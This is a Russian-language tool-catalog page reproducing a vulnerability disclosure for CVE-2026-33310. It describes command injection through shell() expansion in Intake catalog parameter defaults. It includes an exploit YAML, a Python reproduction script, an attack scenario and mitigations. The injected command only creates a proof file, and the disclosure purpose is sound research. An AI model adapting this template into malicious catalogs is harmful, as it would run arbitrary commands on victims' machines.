Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-33310 — Proof-of-concept, демонстрирующий внедрение команд через расширение shell() в значениях параметров по умолчанию в каталогах Intake, с эксплойт-YAML и скриптом воспроизведения. | Kitploit
Инструменты/GitHubGitHub/redyank/cve-2026-33310
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияВеб-безопасностьКомандование и Управление
GitHubredyank/cve-2026-33310

CVE-2026-33310

Proof-of-concept, демонстрирующий внедрение команд через расширение shell() в значениях параметров по умолчанию в каталогах Intake, с эксплойт-YAML и скриптом воспроизведения.

Репозиторий
175 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-33310

CVE-2026-33310 (Command Injection via shell() Expansion in Parameter Defaults)

Сводка

Синтаксис shell() в значениях параметров по умолчанию, по-видимому, автоматически раскрывается в процессе разбора каталога. Если каталог содержит значение параметра по умолчанию, такое как shell(), команда может быть выполнена при обращении к источнику каталога. Это означает, что если пользователь загружает вредоносный YAML-каталог, встроенные команды могут быть выполнены на хост-системе. Такое поведение потенциально может быть классифицировано как CWE-78: OS Command Injection / Unsafe Shell Expansion.

Подробности

Проблема, по-видимому, возникает из-за того, как значения параметров по умолчанию раскрываются при обращении к источнику каталога.

Во время загрузки каталога и обращения к источнику:

Intake разрешает значения параметров по умолчанию Функция, отвечающая за раскрытие значений по умолчанию, обрабатывает синтаксис shell() Выражение shell() запускает выполнение дочернего процесса Поскольку это происходит во время оценки каталога, команда может быть выполнена до того, как пользователь явно взаимодействует с самим набором данных.

Затронутая логика, по-видимому, включает:

root@kitploit:~
expand_defaults()

и связанные механизмы разбора параметров.

PoC

exploit.yaml

root@kitploit:~
metadata:
  version: 1
sources:
  rce_test:
    driver: csv
    description: "Testing shell expansion in parameters"
    args:
      urlpath: "{{ cmd_exec }}"
    parameters:
      cmd_exec:
        display_name: "Test Parameter"
        type: str
        default: "shell(touch /tmp/intake_rce_test)"

reproduce.py

root@kitploit:~
import intake
import os

PROOF_FILE = "/tmp/intake_rce_test"

if os.path.exists(PROOF_FILE):
    os.remove(PROOF_FILE)

print(f"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}")

try:
    cat = intake.open_catalog("exploit.yaml")

    print("Accessing source...")
    _ = cat["rce_test"]

except Exception as e:
    print(f" Error during execution: {e}")

if os.path.exists(PROOF_FILE):
    print(f" Command execution confirmed, Found: {PROOF_FILE}")
else:
    print("Command execution did not occur.")

Сценарий атаки

Потенциальный сценарий атаки может быть следующим:

  1. Злоумышленник публикует вредоносный YAML-файл каталога Intake
  2. Жертва загружает или открывает каталог
  3. Жертва обращается к записи источника в каталоге
  4. Значения параметров по умолчанию раскрываются
  5. Выражение shell() запускает выполнение встроенной команды

Воздействие

Если будет подтверждено, что такое поведение не является преднамеренным, злоумышленник может распространять вредоносный файл каталога через:

  • репозитории Git
  • общие наборы данных
  • URL-адреса
  • рабочие процессы обработки данных
  • Любой пользователь, загружающий каталог, может непреднамеренно выполнить команды с правами своей локальной учетной записи.

Рекомендация

Возможные меры по смягчению проблемы могут включать:

  • отключение раскрытия shell() по умолчанию
  • требование явного флага согласия (например, allow_shell=True)
  • ограничение выполнения shell для каталогов, загруженных из ненадежных источников Пожалуйста, сообщите, если потребуется дополнительная информация или тестирование. Я готов помочь с дальнейшим анализом или проверкой.
Скачать инструмент